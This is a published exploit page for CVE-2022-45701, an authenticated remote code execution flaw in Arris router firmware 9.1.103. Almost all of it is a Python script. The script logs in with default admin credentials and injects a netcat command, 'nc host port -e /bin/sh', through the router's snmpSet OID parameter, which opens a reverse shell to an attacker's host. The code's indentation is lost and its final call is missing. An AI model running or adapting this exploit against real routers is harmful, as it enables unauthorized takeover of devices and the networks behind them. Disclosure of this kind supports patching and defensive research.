Arris Router Firmware 9.1.103 Remote Code Execution

Arris Router Firmware version 9.1.103 authenticated remote code execution exploit that has been tested against the TG2482A, TG2492, and SBG10 models.

SHA-256 | c888a848e11678625335a5e6746925d5f7f030e21217d0ca2ec6555b03d7a881

c# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage:
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701

import requests
import base64

router_host = ""
username = "admin"
password = "password"

lhost = ""
lport = 80

def main():
cookie = get_cookie(gen_header(username, password))
if cookie == '':
print("Failed to authorize")
print("Generating Payload...")
payload = gen_payload(lhost, lport)
print("Sending Payload...")
send_payload(payload, cookie)
print("Done, check shell..")

def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")

def no_encode_params(params):
return "&".join("%s=%s" % (k,v) for k,v in params.items())

def get_cookie(header):
url = router_host+"/login"
params = no_encode_params({"arg":header, "_n":1})
resp=requests.get(url, params=params)
return resp.content.decode('UTF-8')

def set_oid(oid, cookie):
url = router_host+"/snmpSet"
params = no_encode_params({"oid":oid, "_n":1})
cookies = {"credential":cookie}
requests.get(url, params=params, cookies=cookies)

def gen_payload(h, p):
return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"

def send_payload(payload, cookie):
set_oid(";2;", cookie)
set_oid(f"{payload};4;", cookie)
set_oid(";66;", cookie)
set_oid(";66;", cookie)
set_oid(";66;", cookie)
set_oid(";2;", cookie)

if __name__ == '__main__':

Related Posts